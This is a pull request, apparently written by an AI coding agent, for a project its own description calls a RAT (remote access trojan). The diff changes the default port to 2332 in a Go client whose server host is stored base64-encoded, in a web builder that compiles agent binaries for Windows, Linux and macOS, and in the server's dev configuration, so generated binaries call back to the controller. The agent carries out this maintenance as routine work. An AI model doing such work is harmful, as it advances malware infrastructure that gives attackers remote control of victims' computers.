### PR TITLE
Align default RAT port to 2332

### DIFF
--- a/tenvy-client/cmd/main.go
+++ b/tenvy-client/cmd/main.go
@@ -864,7 +864,7 @@ func collectMetadata() AgentMetadata {
 
 func defaultServerURL() string {
 	host := strings.TrimSpace(fallback(decodeBase64(defaultServerHostEncoded), "localhost"))
-	port := strings.TrimSpace(fallback(decodeBase64(defaultServerPortEncoded), "3000"))
+	port := strings.TrimSpace(fallback(decodeBase64(defaultServerPortEncoded), "2332"))
 
 	if host == "" {
 		host = "localhost"
@@ -875,7 +875,7 @@ func defaultServerURL() string {
 	}
 
 	if port == "" {
-		port = "3000"
+		port = "2332"
 	}
 
 	scheme := "http"

--- a/tenvy-server/src/routes/(app)/build/+page.svelte
+++ b/tenvy-server/src/routes/(app)/build/+page.svelte
@@ -28,7 +28,7 @@
         };
 
 	let host = $state('localhost');
-	let port = $state('3000');
+	let port = $state('2332');
         type TargetOS = 'windows' | 'linux' | 'darwin';
         type TargetArch = 'amd64' | '386' | 'arm64';
 
@@ -268,7 +268,7 @@
 
                 const payload: Record<string, unknown> = {
                         host: trimmedHost,
-                        port: trimmedPort || '3000',
+                        port: trimmedPort || '2332',
                         outputFilename: outputFilename.trim() || 'tenvy-client',
                         outputExtension,
                         targetOS,
@@ -406,7 +406,7 @@
                                 </div>
                                 <div class="grid gap-2">
                                         <Label for="port">Port</Label>
-                                        <Input id="port" placeholder="3000" bind:value={port} inputmode="numeric" />
+                                        <Input id="port" placeholder="2332" bind:value={port} inputmode="numeric" />
                                 </div>
                                 <div class="grid gap-2">
                                         <Label for="output">Output filename</Label>

--- a/tenvy-server/src/routes/api/build/+server.ts
+++ b/tenvy-server/src/routes/api/build/+server.ts
@@ -382,7 +382,7 @@ export const POST: RequestHandler = async ({ request }) => {
                 throw error(400, 'Host cannot contain whitespace');
         }
 
-        const port = (payload.port ?? '3000').toString().trim();
+        const port = (payload.port ?? '2332').toString().trim();
         if (!/^\d+$/.test(port)) {
                 throw error(400, 'Port must be numeric');
         }

--- a/tenvy-server/vite.config.ts
+++ b/tenvy-server/vite.config.ts
@@ -3,18 +3,61 @@ import tailwindcss from '@tailwindcss/vite';
 import { defineConfig } from 'vitest/config';
 import { sveltekit } from '@sveltejs/kit/vite';
 
+function resolvePort(value?: string | null): number {
+        if (!value) {
+                return 2332;
+        }
+
+        const parsed = Number.parseInt(value, 10);
+        if (Number.isNaN(parsed) || parsed <= 0 || parsed > 65_535) {
+                return 2332;
+        }
+
+        return parsed;
+}
+
+function resolveHost(value?: string | null): string | boolean {
+        if (!value) {
+                return '0.0.0.0';
+        }
+
+        const trimmed = value.trim();
+        if (trimmed === '') {
+                return '0.0.0.0';
+        }
+
+        if (trimmed.toLowerCase() === 'true') {
+                return true;
+        }
+
+        return trimmed;
+}
+
+const serverPort = resolvePort(process.env.TENVY_SERVER_PORT ?? process.env.PORT ?? null);
+const serverHost = resolveHost(process.env.TENVY_SERVER_HOST ?? process.env.HOST ?? null);
+
 export default defineConfig({
-	plugins: [
-		tailwindcss(),
-		sveltekit(),
-		paraglideVitePlugin({
-			project: './project.inlang',
-			outdir: './src/lib/paraglide'
-		})
-	],
-	test: {
-		expect: { requireAssertions: true },
-		projects: [
+        plugins: [
+                tailwindcss(),
+                sveltekit(),
+                paraglideVitePlugin({
+                        project: './project.inlang',
+                        outdir: './src/lib/paraglide'
+                })
+        ],
+        server: {
+                host: serverHost,
+                port: serverPort,
+                strictPort: true
+        },
+        preview: {
+                host: typeof serverHost === 'string' ? serverHost : '0.0.0.0',
+                port: serverPort,
+                strictPort: true
+        },
+        test: {
+                expect: { requireAssertions: true },
+                projects: [
 			{
 				extends: './vite.config.ts',
 				test: {


### PR DESCRIPTION
## Summary
- default the agent build form and build API to the 2332 RAT port so generated binaries target the controller
- configure the client binary default URL to use port 2332
- ensure the SvelteKit dev/preview servers bind to the configured host and fall back to port 2332

## Testing
- go test ./...


------
https://chatgpt.com/codex/tasks/task_e_68e3e8fbedbc832bb8159c21551c6c02